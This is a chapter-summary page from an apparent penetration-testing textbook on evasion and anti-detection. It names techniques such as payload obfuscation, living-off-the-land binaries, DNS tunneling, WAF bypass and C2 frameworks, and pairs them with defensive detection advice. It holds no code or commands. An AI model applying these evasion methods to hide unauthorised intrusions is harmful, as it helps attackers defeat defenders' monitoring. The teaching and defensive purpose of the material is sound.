Chapter 27 Key Takeaways: Evasion and Anti-Detection Techniques

Core Principles

  1. Evasion is a professional obligation, not a party trick. Penetration tests that are immediately detected only validate that detections work. They do not reveal the far more dangerous scenario: what happens when detections fail. Evasion testing provides organizations with a realistic assessment of their security posture against skilled adversaries.

  2. Ethics frame everything. Every evasion technique must be authorized in writing, proportional to the engagement objectives, and fully documented in the final report. The value of evasion testing is in the disclosure and remediation, not in the secrecy.

  3. Detection is layered, so evasion must be layered. Modern security operates across multiple detection planes: signatures, heuristics, behavioral analysis, machine learning, kernel telemetry, network monitoring, and threat intelligence. Effective evasion must address the entire stack, not just one layer.

Technical Essentials

  1. Understand what you are evading. AV uses signatures, heuristics, and ML. EDR adds kernel callbacks, user-mode hooks, ETW telemetry, and AMSI. You cannot evade what you do not understand. Study the detection architecture before choosing evasion techniques.

  2. Payload obfuscation defeats static analysis, not behavioral analysis. Encoding, encryption, and custom loaders prevent signature matching, but the payload's runtime behavior (process injection, credential access, network connections) still generates telemetry. Both must be addressed.

  3. Living Off the Land is the most effective evasion. Using only signed, legitimate system binaries (LOLBins) eliminates the primary detection signal: untrusted executables. The LOLBAS and GTFOBins projects catalog hundreds of abusable binaries across Windows and Linux.

  4. Network evasion requires understanding the inspection stack. Firewalls inspect headers; IDS/IPS inspect content; NDR analyzes behavior. Techniques like DNS tunneling, protocol encapsulation, and encrypted channels each address different inspection capabilities. Traffic pattern analysis (beacon detection, JA3 fingerprinting) catches what content inspection misses.

  5. WAFs are a compensating control, not a solution. WAF bypass techniques (encoding tricks, alternative syntax, comment injection) demonstrate that the real fix is eliminating the underlying vulnerability, not filtering malicious input at the perimeter.

  6. C2 framework selection is a strategic decision. Cobalt Strike offers maturity and features but faces extensive detection. Sliver and Mythic provide open-source alternatives with lower detection profiles. Newer tools (Havoc, Brute Ratel) offer advanced evasion but face the same proliferation-detection cycle.

Defensive Takeaways

  1. Behavioral detection beats signature detection. The Volt Typhoon campaign proved that disciplined adversaries can operate using only built-in tools. Detection must focus on what actions are performed (credential dumping, lateral movement, data staging) rather than which tools perform them.

  2. Command-line logging is non-negotiable. Sysmon Event ID 1 with full command-line capture is the single most important detection data source for LOTL activity. Without it, LOTL operations are invisible.

  3. Baseline normal to detect abnormal. If you do not know what normal LOLBin usage looks like in your environment, you cannot detect abnormal usage. Build behavioral baselines for critical systems and accounts.

Career Applications

  • Red team operators: Master evasion to provide realistic assessments; always document and disclose
  • Blue team analysts: Study evasion to identify detection gaps and build better rules
  • SOC engineers: Focus on behavioral detection and anomaly analysis over signature matching
  • Security architects: Design defense-in-depth that addresses multiple evasion categories simultaneously
  • Compliance professionals: Ensure red team engagements include evasion testing to validate control effectiveness